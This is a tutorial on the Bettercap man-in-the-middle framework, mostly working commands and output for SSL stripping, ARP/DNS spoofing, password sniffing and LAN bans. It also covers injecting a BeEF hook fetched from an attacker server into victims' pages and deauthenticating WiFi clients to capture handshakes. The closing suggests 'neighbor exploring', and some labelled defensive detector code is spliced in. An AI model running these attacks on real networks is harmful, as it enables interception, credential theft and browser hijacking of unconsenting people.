Introduction
We already talked about Bettercap – MITM Attack Framework, but we decided to separate examples from the general tool info. Here, we’ll go over some Bettercap Usage Examples. There is a lot to cover, and things might not work as expected depending on the situation and network architecture, but we’ll try to cover as much as we can, updating this post as time goes by.
Jump to:
- Transparent HTTP(S) Proxy
- DNS Spoofing
- ARP Spoofing
- DNS/ARP Spoofing
- Password Sniffing
- Proxy JS Injection (XSS)
- Terminate Target Connectivity – Ban (LAN)
- MAC Changer
- WiFi Network Monitoring (Playground)
- BLE (Bluetooth Low Energy device discovery)
Transparent HTTP(S) Proxy
For HTTPS, enable http.proxy.sslstrip. We also need to ARP spoof the victim's address:
» set http.proxy.sslstrip true
» set net.sniff.verbose false
» set arp.spoof.targets 192.168.1.6
» arp.spoof on
» http.proxy on
» net.sniff on
Chrome will cause problems with HSTS-preloaded sites, showing the message "Your connection is not private". For non-HSTS domains it will let you continue via the "Proceed to <domain> (unsafe)" link. Internet Explorer shows a similar message: "There is a problem with the website's security certificate". We'll fight with HSTS (hijacking) and SSL sites some other time.
DNS Spoofing
We need to define which domains we're going to spoof, and to which IP to redirect them:
» set dns.spoof.domains <domain1>,<domain2>,...
» set dns.spoof.address <Target address>
To spoof entire subnet, set:
» set dns.spoof.all true
Run it with:
» dns.spoof on
You should probably also arp.spoof the subnet or the target.
ARP Spoofing
As before, adjust the module:
» arp.spoof off
» set arp.spoof.targets 192.168.1.6
» arp.spoof on
All traffic from/to 192.168.1.6 will be redirected to you (bettercap). That’s going to cause connection issues on the target.
DNS/ARP Spoofing
» get dns.spoof.*
  dns.spoof.address: '192.168.1.3'
  dns.spoof.all: 'false'
  dns.spoof.domains: ': time.com'
» get arp.spoof.*
  arp.spoof.internal: 'true'
  arp.spoof.targets: '192.168.1.6'
  arp.spoof.whitelist: ''
One issue I experienced while spoofing DNS/ARP is conflicts. By ARP poisoning the target and enabling DNS spoofing, I saw nslookup return conflicting data on the target side, as if my ARP poison and the router were arguing with the target over who is right. I could clearly see the address switching from second to second. On WiFi clients it seems to work, but for targets on Ethernet (wired):
C:\> nslookup time.com
Server:  csp1.zte.com.cn
Address:  192.168.1.1

Non-authoritative answer:
Name:    time.com
Addresses:  192.168.1.3 (Spoofed)
            192.168.1.3 (Spoofed)
and in the next second:
C:\> nslookup time.com
Server:  csp1.zte.com.cn
Address:  192.168.1.1

Non-authoritative answer:
Name:    time.com
Addresses:  192.168.1.3 (Spoofed)
            54.230.93.177 (RealIP)
When I try to load the page, one moment it fails to load and the next moment it's fully loaded. One thing that managed to solve it permanently is to use:
» arp.ban on
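A monitor-side check for the tug-of-war just described, added here as an example (not code from the original post or from bettercap) that serves both the DNS Spoofing section and this one: it replays constructed ARP announcements and resolver answers, flags the gateway IP flipping between two MACs and one MAC claiming both gateway and target, and flags public names resolving to private addresses or changing answers between lookups. The MAC addresses and the example.net answer are constructed; the IPs follow the page.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: ARP "is-at" announcements seen by a LAN monitor, as (time, ip, mac).
# IPs follow the page (gateway 192.168.1.1, attacker 192.168.1.3); the MACs are made up.
ARP_LOG = [
    ("16:41:01", "192.168.1.1", "aa:aa:aa:00:00:01"),  # real router
    ("16:41:02", "192.168.1.6", "bb:bb:bb:00:00:06"),  # target
    ("16:41:03", "192.168.1.1", "cc:cc:cc:00:00:03"),  # poison: gateway IP from attacker MAC
    ("16:41:04", "192.168.1.6", "cc:cc:cc:00:00:03"),  # the same MAC also claims the target
    ("16:41:05", "192.168.1.1", "aa:aa:aa:00:00:01"),  # router re-announces itself
]

# Constructed sample: successive resolver answers, as (time, name, [addresses]); the first
# two mirror the nslookup output above (spoofed LAN address, then a mix with the real one).
DNS_LOG = [
    ("16:41:10", "time.com", ["192.168.1.3", "192.168.1.3"]),
    ("16:41:11", "time.com", ["192.168.1.3", "54.230.93.177"]),
    ("16:41:12", "example.net", ["54.230.93.200"]),  # constructed public address, no alert
]

def arp_alerts(log):
    """Flag an IP whose MAC changes and a MAC that claims more than one IP."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for ts, ip, mac in log:
        mac = mac.lower()
        if ip in ip_to_mac and ip_to_mac[ip] != mac:
            alerts.append(f"{ts} {ip} moved from {ip_to_mac[ip]} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == 2:  # report once, when the second IP appears
            alerts.append(f"{ts} {mac} claims {sorted(mac_to_ips[mac])}")
    return alerts

def dns_alerts(log):
    """Flag private addresses in answers for public names, and answer sets that flip."""
    last, alerts = {}, []
    for ts, name, addrs in log:
        private = sorted({a for a in addrs if ipaddress.ip_address(a).is_private})
        if private:
            alerts.append(f"{ts} {name} resolved to private {private}")
        if name in last and set(last[name]) != set(addrs):
            alerts.append(f"{ts} {name} answers changed {sorted(set(last[name]))} -> {sorted(set(addrs))}")
        last[name] = addrs
    return alerts

if __name__ == "__main__":
    for line in arp_alerts(ARP_LOG) + dns_alerts(DNS_LOG):
        print(line)
```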
Password Sniffing
For the purpose of this example we'll check some requests from the localhost. Start bettercap (maybe in -debug mode) and set:
» set net.sniff.filter 'not arp'   (default: not arp)
» set net.sniff.local true
» set net.sniff.regexp '.*password=.+'
» set net.sniff.verbose 'true'
You could setup an output file:
» set net.sniff.output 'passwords.pcap'
so you can inspect the packet dump later on with a tool like Wireshark. Alternatively, you can use something from the terminal:
$ tcpdump -qns 0 -X -r dump.pcap
$ tshark -r dump.pcap
$ tcpick -C -yP -r tcp_dump.pcap
By going to a domain and doing a couple of requests, we can see some captured traffic:
In the example above we have one form login and a few GET password requests. GET requests are clearly visible inline. The form POST request visible in Wireshark is also nicely formatted within Bettercap:
192.168.1.0/24 > 192.168.1.3 » [16:41:38] [net.sniff.leak.http] http local POST 192.168.1.100/login.php Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.106 Chrome/68.0.3440.106 Safari/537.36

Method: POST
URL: /login.php

Headers:
  Upgrade-Insecure-Requests => 1
  Content-Type => application/x-www-form-urlencoded
  Accept-Language => en-US,en;q=0.9
  Cookie => PHPSESSID=2s7aaagjrj2ks7n3a8kflne5n2
  Connection => keep-alive
  Cache-Control => max-age=0
  Origin => http://192.168.1.100
  Accept => text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  Referer => http://192.168.1.100/login.php
  Accept-Encoding => gzip, deflate
  Content-Length => 38
  User-Agent => Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.106 Chrome/68.0.3440.106 Safari/537.36

Form:
  password => theone
  submit =>
  username => admin
You could use the predefined caplet http-req-dump.cap:
# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.10"

# to make it less verbose
# events.stream off

# discover a few hosts
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
set net.sniff.verbose false
set net.sniff.local true
set net.sniff.filter tcp port 443
net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js

clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on
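To review what a caplet will do before running it, here is a small dry-run parser for the caplet and -eval syntax used above; it is an added example, not part of the original post or of bettercap, and it assumes the -eval commands are applied before the caplet (the selective-targets usage in the caplet's own comment relies on that). The embedded caplet is a constructed, shortened copy of http-req-dump.cap.

```python
import shlex

def parse_commands(text, sep="\n"):
    """Split caplet text (one command per line, '#' comment lines) or a -eval string
    (commands separated by ';') into token lists; blank and comment entries are dropped."""
    cmds = []
    for raw in text.split(sep):
        line = raw.strip()
        if line and not line.startswith("#"):
            cmds.append(shlex.split(line))
    return cmds

def effective_plan(caplet_text, eval_text=""):
    """Settings after every 'set', plus the other commands in order. Assumes -eval commands
    run before the caplet, which the caplet's own selective-targets comment relies on."""
    settings, actions = {}, []
    for cmd in parse_commands(eval_text, ";") + parse_commands(caplet_text):
        if cmd[0] == "set" and len(cmd) >= 2:
            settings[cmd[1]] = " ".join(cmd[2:])
        else:
            actions.append((cmd[0], " ".join(cmd[1:])))
    return settings, actions

def enabled_modules(actions):
    """Modules whose last on/off action leaves them on (net.probe on ... off is not)."""
    state = {}
    for module, arg in actions:
        if arg in ("on", "off"):
            state[module] = arg
    return sorted(m for m, s in state.items() if s == "on")

CAPLET = """
# constructed, shortened copy of http-req-dump.cap (this line is skipped as a comment)
net.probe on
sleep 1
net.probe off
set net.sniff.filter tcp port 443
net.sniff on
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js
clear
http.proxy on
https.proxy on
arp.spoof on
"""

if __name__ == "__main__":
    settings, actions = effective_plan(CAPLET, "set arp.spoof.targets 192.168.1.10")
    print("targets:", settings.get("arp.spoof.targets", "<whole subnet>"))
    print("modules on:", enabled_modules(actions))
```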
Proxy JS Injection (XSS)
Within the caplets repository we have beef-passive.cap and beef-active.cap. I was unable to get any info with the passive one, but the active one works just fine. If we look at the caplet:
# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
It sets the script and the HTTP proxy, and it spoofs the entire subnet. The beef-inject.js content:
function onLoad() {
    log( "BeefInject loaded." );
    log("targets: " + env('arp.spoof.targets'));
}

function onResponse(req, res) {
    // only touch HTML responses
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            log( "BeefInject loaded." );
            log("targets: " + env('arp.spoof.targets'));
            // insert the hook right before the closing head tag
            res.Body = body.replace( '</head>', '<script type="text/javascript" src="http://<YOUR_SERVER>:3000/hook.js"></script></head>' );
        }
    }
}
It simply logs the info in the Bettercap console and injects the BeEF (The Browser Exploitation Framework Project) hook. Although BeEF is a great tool, you can also create your own script: alter the line and set your own script instead of hook.js (src="http://<YOUR_SERVER>/my_hook.js">). For example, set the content to:
alert("*** CyberPunk injected script ***");
and run bettercap with -eval (targeting a specific computer in my LAN):
$ bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.6; arp.spoof on;" -debug
When the user opens an HTTP website, for instance time.com, the hook will be executed and we'll end up with:
XSS in the making.
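From the client side, a proxy-inserted hook looks like a <script> tag pointing at a host the page never referenced. The check below, an added example rather than code from the post or from BeEF, parses the delivered HTML and reports off-origin or cleartext script sources; the page body, the origin 192.168.1.100 and the host hook.example (standing in for <YOUR_SERVER>) are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> element in a document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

def foreign_scripts(html, page_origin, allowed_hosts=()):
    """Return (reason, src) for scripts loaded from a host other than the page's own
    (and not in allowed_hosts) or over cleartext http. Comparing the delivered page with
    the expected one, a proxy-inserted hook shows up as exactly such an off-origin tag."""
    parser = ScriptCollector()
    parser.feed(html)
    page_host = urlparse(page_origin).hostname
    findings = []
    for src in parser.sources:
        url = urlparse(src)
        if not url.hostname:  # relative URL: same origin as the page
            continue
        if url.hostname != page_host and url.hostname not in allowed_hosts:
            findings.append(("off-origin", src))
        elif url.scheme == "http":
            findings.append(("cleartext", src))
    return findings

# Constructed sample: a login page as served over HTTP (origin from the sniffer output
# above) and the same page after a proxy inserted a hook before </head>. The host
# hook.example stands in for the <YOUR_SERVER> placeholder used by beef-inject.js.
ORIGIN = "http://192.168.1.100"
CLEAN = '<html><head><title>Login</title><script src="/static/app.js"></script></head><body></body></html>'
INJECTED = CLEAN.replace("</head>", '<script type="text/javascript" src="http://hook.example:3000/hook.js"></script></head>')

if __name__ == "__main__":
    print(foreign_scripts(CLEAN, ORIGIN))     # []
    print(foreign_scripts(INJECTED, ORIGIN))  # [('off-origin', 'http://hook.example:3000/hook.js')]
```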
Terminate Target Connectivity – Ban (LAN)
Start the ARP spoofer in ban mode, meaning the target(s)' connectivity will stop working.
» set arp.spoof.targets <TARGET_IP>
» arp.ban on
MAC Changer
Before you continue, check your current interface:
$ ifconfig
wlx000e3b332e08: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether e4:af:e5:e3:d6:35  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Shut it down:
$ ifconfig <WLAN_INTERFACE> down
Then in bettercap, hit:
192.168.1.0/24 > 192.168.x.x » mac.changer off
192.168.1.0/24 > 192.168.x.x » set mac.changer.iface wlx000e3b332e08
192.168.1.0/24 > 192.168.x.x » mac.changer on
192.168.1.0/24 > 192.168.x.x » [19:24:24] [sys.log] [inf] Interface mac address set to cc:88:45:f5:da:48
Turn it back on:
$ ifconfig <WLAN_INTERFACE> up
Now if you check ifconfig again:
wlx000e3b332e08: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether cc:88:45:f5:da:48  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
WiFi Network Monitoring (Playground)
The new wifi.recon module covers both the 2.4 GHz and 5 GHz bands. It does everything you need: deauth, sniffing, handshake captures. To start, add the -iface option:
$ bettercap -iface wlan0
Note: in case of the error "Can't restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor). Please adjust manually.", quit bettercap and manually set the wireless interface to monitor mode, for example as follows:
$ sudo ip link set wlan0 down
$ sudo iw wlan0 set monitor control
$ sudo ip link set wlan0 up
Turn on recon:
0.0.0.0/0 > 0.0.0.0 » wifi.recon on
[17:57:39] [sys.log] [inf] WiFi recon active with channel hopping.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [sys.log] [inf] Channel hopper started.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point SNUPI (-49 dBm) detected as 94:53:30:a6:1b:63 (Hon Hai Precision Ind. Co.).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-49 dBm) detected as 96:53:30:a6:1a:64.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point Olos (-65 dBm) detected as ec:aa:a0:13:d1:4b (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point 58e699 (-71 dBm) detected as d8:97:ba:eb:e2:f0 (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point 566eef (-69 dBm) detected as d8:97:ba:ea:cf:af (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-73 dBm) detected as da:97:ba:ea:cf:a1.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point 506fd9 (-67 dBm) detected as d8:97:ba:37:35:16 (Pegatron).
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-69 dBm) detected as da:97:ba:37:35:18.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point UniFi (-71 dBm) detected as da:97:ba:eb:e2:f2.
0.0.0.0/0 > 0.0.0.0 » [17:57:39] [wifi.ap.new] WiFi access point ZTE_0D3585 (-67 dBm) detected as b0:c1:9e:0d:35:85.
...
You can manage channels with:
» wifi.recon.channel 10,11
To clear them:
» wifi.recon.channel clear
Results can be seen with:
» wifi.show

+---------+-------------------+----------------+------------------+---------+---------+--------+-------+-----------+
| RSSI    | BSSID             | SSID           | Encryption       | Channel | Clients | Sent   | Recvd | Last Seen |
+---------+-------------------+----------------+------------------+---------+---------+--------+-------+-----------+
| -47 dBm | 94:33:30:a6:2b:63 | SNUPI          | WPA2 (TKIP, PSK) | 1       |         | 1.3 kB |       | 18:02:14  |
| -59 dBm | 7e:d5:07:70:33:65 | UniFi          | WPA2 (CCMP, MGT) | 11      |         |        |       | 18:02:13  |
| -61 dBm | 76:25:2a:33:54:65 | UniFi          | WPA2 (CCMP, MGT) | 6       |         |        |       | 18:02:16  |
| ...     |                   |                |                  |         |         |        |       |           |
| -75 dBm | 74:ba:3a:c7:66:e0 | TP-LINK_C776E0 | WPA2 (TKIP, PSK) | 9       |         |        |       | 18:02:13  |
| -77 dBm | 5c:37:76:6b:3d:af | HH41V_4DAF     | WPA2 (TKIP, PSK) | 8       |         |        |       | 18:02:16  |
| -79 dBm | fc:2a:5e:d2:2c:c2 | ZTE_D24CC2     | WPA2 (CCMP, PSK) | 13      |         |        |       | 18:02:14  |
+---------+-------------------+----------------+------------------+---------+---------+--------+-------+-----------+
To capture handshakes, we should define a sniffer, filter the specific frames (EAPOL, ethertype 0x888e), set the output file for processing later on, and maybe select the channel and/or target:
» set net.sniff.verbose true
» set net.sniff.filter ether proto 0x888e
» set net.sniff.output /root/wpa.pcap
» net.sniff on
» wifi.recon.channel 1
» wifi.recon on
» wifi.recon 94:33:30:a6:2b:63
Then we should hit it with the Deauth. You can deauth all clients with:
» wifi.deauth AP-BSSID
or just specific one:
» wifi.deauth CLIENT-BSSID
Once you capture the handshake, you can start breaking it. We'll not cover that here.
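On the monitoring side, the sequence this section walks through leaves a distinctive trace: a burst of deauthentication frames for one BSSID, followed shortly by EAPOL frames as the client re-associates. The detector below is an added example, not code from the post or from bettercap; the frames are a constructed sample and the window, threshold and follow-up timings are assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "94:33:30:a6:2b:63"  # the access point targeted in the commands above

# Constructed sample of 802.11 frames as (seconds, kind, bssid, destination): "deauth" is a
# management frame (type 0, subtype 12), "eapol" a data frame carrying ethertype 0x888e.
FRAMES = (
    [(0.0, "data", AP, "bb:bb:bb:00:00:01")]
    + [(1.0 + i / 10, "deauth", AP, BROADCAST) for i in range(6)]          # deauth burst
    + [(3.0 + i / 10, "eapol", AP, "bb:bb:bb:00:00:01") for i in range(4)]  # client re-associates
    + [(10.0, "deauth", "ec:aa:a0:13:d1:4b", "dd:dd:dd:00:00:02")]          # a single, ordinary deauth
)

def deauth_alerts(frames, window=2.0, threshold=5, follow=10.0):
    """Alert when `threshold` deauth frames for one BSSID arrive within `window` seconds,
    and again when an EAPOL exchange starts within `follow` seconds of that burst, which is
    the forced-reconnect pattern behind handshake capture. Timings are assumed defaults."""
    recent = defaultdict(deque)  # bssid -> timestamps of deauths inside the window
    last_burst = {}              # bssid -> time the burst was reported
    alerts = []
    for ts, kind, bssid, dst in frames:
        if kind == "deauth":
            q = recent[bssid]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) == threshold:  # fires once per crossing of the threshold
                last_burst[bssid] = ts
                scope = "broadcast" if dst == BROADCAST else f"client {dst}"
                alerts.append(f"{ts:.1f}s deauth burst on {bssid} ({scope})")
        elif kind == "eapol" and bssid in last_burst and ts - last_burst[bssid] <= follow:
            alerts.append(f"{ts:.1f}s EAPOL handshake on {bssid} {ts - last_burst.pop(bssid):.1f}s after the burst")
    return alerts

if __name__ == "__main__":
    for line in deauth_alerts(FRAMES):
        print(line)
```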
BLE (Bluetooth Low Energy device discovery)
The ble.recon module will discover every BLE device around; you can then inspect one with ble.enum or play around with ble.write.
To connect, enumerate and read characteristics from the BLE device 04:ff:de:ff:be:ff:
» ble.enum 04:ff:de:ff:be:ff
Write the bytes ff ff ff ff ff ff ff ff to the BLE device 04:ff:de:ff:be:ff on its characteristic with UUID 234afbd5e3b34536a3fe72f630d4278d:
» ble.write 04:ff:de:ff:be:ff 234afbd5e3b34536a3fe72f630d4278d ffffffffffffffff
Issues:
- ble.enum only works one time per execution
- incomplete support for macOS
- not supported on Windows
Caplets
Bettercap caplets, or .cap files, are a powerful way to script bettercap's interactive sessions; think of them as the .rc files of Metasploit. Check this repository for available caplets and modules. Some of them we already mentioned above; others we'll leave for you to play with. From the names below you can see what's already available:
- airodump.cap
- ap.cap
- ap-config.cap
- beef-active.cap
- beef-passive.cap
- crypto-miner.cap
- download-autopwn
- download-autopwn.cap
- fb-phish.cap
- gps.cap
- hstshijack
- http-req-dump.cap
- local-sniffer.cap
- login-man-abuse.cap
- massdeauth.cap
- mitm6.cap
- netmon.cap
- pita.cap
- proxy-script-test.cap
- recon-active.cap
- recon-passive.cap
- rest-api.cap
- rogue-mysql-server.cap
- rtfm.cap
- simple-passwords-sniffer.cap
- stsoy.cap
- tcp-req-dump.cap
- test-prompt-stats.cap
- web-override.cap
- wpa_handshake.cap
Conclusion
WiFi games, redirection, phishing, sniffing, injections... These Bettercap usage examples provide just a basic insight into how things work and what you can do, which is a lot (relatively). It can (and probably will) cause some headaches while trying to do a specific attack: DNS issues, HSTS problems, SSLSplit issues, etc. Deal with it, explore. If nothing else, it will make you research things and understand how things work or don't work. A tool you should maybe have in mind for some pentesting, neighbor exploring or cyberwarfare activities.